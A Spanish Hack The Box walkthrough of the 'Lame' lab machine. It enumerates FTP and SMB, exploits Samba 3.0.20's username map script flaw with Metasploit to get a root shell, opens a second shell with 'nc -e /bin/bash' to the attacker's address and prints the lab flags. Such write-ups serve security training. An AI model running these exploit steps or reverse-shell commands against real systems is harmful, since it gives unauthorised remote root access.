<- HTB

Lame


4 minutos de lectura

Lame
Hack The Box. Linux. Máquina fácil. Esta máquina expone versiones vulnerables de servicios FTP y SMB. El servicio SMB es explotable y deriva en RCE como root
  • SO: Linux
  • Dificultad: Fácil
  • Dirección IP: 10.10.10.3
  • Fecha: 14 / 03 / 2017

Escaneo de puertos

# Nmap 7.92 scan initiate as: nmap -sC -sV -Pn -o nmap/targeted 10.10.10.3 -p 21,22,139,445,3632  
Nmap scan report for 10.10.10.3
Host is up (0.064s latency).

PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.17.44
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name:
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time:
|_clock-skew: mean: 2h01m21s, deviation: 2h49m45s, median: 1m18s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done -- 1 IP address (1 host up) scanned in 52.51 seconds

La máquina tiene abiertos los puertos 21 (FTP), 22 (SSH), 139, 445 (SMB) y 3632.

Enumeración por FTP

Como dice nmap podemos acceder por FTP con credenciales anonymous:

$ ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:rocky): anonymous
331 Please specify the password.
Password:
230 Login successful.
ftp> dir
200 PORT command successful. Consider using PASV.  
150 Here comes the directory listing.
226 Directory send OK.

Pero no hay nada dentro.

Podemos buscar exploits para la versión del servicio FTP (vsFTP 2.3.4) con searchsploit:

$ searchsploit vsftp 2.3.4
------------------------------------------------------- ----------------------  
Exploit Title                                          | Path
------------------------------------------------------- ----------------------
vsftpd 2.3.4 - Backdoor Command Execution              | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | unix/remote/17491.rb
------------------------------------------------------- ----------------------
Shellcodes: No Results

Vale, parece que podemos obtener ejecución remota de comandos (RCE) para esta versión (CVE-2011-2523). Si inspeccionamos el código fuente del exploit, parece que hay una puerta trasera (backdoor) para el usuario nergal:) que abre una shell en el puerto 6200. No obstante, no es explotable.

Enumeración por SMB

Vamos a buscar exploit para Samba 3.0.20 en searchsploit:

$ searchsploit Samba 3.0.20
--------------------------------------------------------------------------------- ---------------------------------  
Exploit Title                                                                    | Path
--------------------------------------------------------------------------------- ---------------------------------
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass                           | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit) | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow                                            | linux/remote/7701.txt
Samba < 3.0.20 - Remote Heap Overflow                                            | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC)                                    | linux_x86/dos/36741.py
-------------------------------------------------------------------------------------------------------------------
Shellcodes: No Results

Genial, hay uno que nos da RCE.

Intrusión en la máquina

Vamos a utilizar Metasploit para esto:

# msfconsole -q
msf6 > search Samba 3.0.20

Matching Modules
================

   #  Name                                Disclosure Date  Rank       Check  Description
   -  ----                                ---------------  ----       -----  -----------
   0  exploit/multi/samba/usermap_script  2007-05-14       excellent  No     Samba "username map script" Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/samba/usermap_script

msf6 > use exploit/multi/samba/usermap_script
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit  
   RPORT   139              yes       The target port (TCP)


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.100    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(multi/samba/usermap_script) > set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3
msf6 exploit(multi/samba/usermap_script) > set LHOST 10.10.17.44
LHOST => 10.10.17.44
msf6 exploit(multi/samba/usermap_script) > exploit

[*] Started reverse TCP handler on 10.10.17.44:4444
[*] Command shell session 1 opened (10.10.17.44:4444 -> 10.10.10.3:40626) at 2022-07-17 18:24:10 +0200

which nc
/bin/nc
nc -e /bin/bash 10.10.17.44 5555

Decidí utilizar una segunda reverse shell para obtener una TTY completa en nc:

$ nc -nlvp 5555
Ncat: Version 7.92 ( https://nmap.org/ncat )  
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 10.10.10.3.
Ncat: Connection from 10.10.10.3:54564.
script /dev/null -c bash
root@lame:/# ^Z
zsh: suspended  ncat -nlvp 5555

$ stty raw -echo; fg
[1]  + continued  ncat -nlvp 5555

Erase set to delete.
Kill set to control-U (^U).
Interrupt set to control-C (^C).
root@lame:/# export TERM=xterm
root@lame:/# export SHELL=bash
root@lame:/# stty rows 50 columns 158

Escalada de privilegios

Ya somos root, por lo que solamente tenemos que capturar las flags:

root@lame:/# ls /home
ftp  makis  service  user
root@lame:/# find /home -name user.txt  
/home/makis/user.txt
root@lame:/# cat /home/makis/user.txt
56c5a638db443c0dd212990228c55aec
root@lame:/# cat /root/root.txt
490c7ed2a8c6e7a72d719d478938accc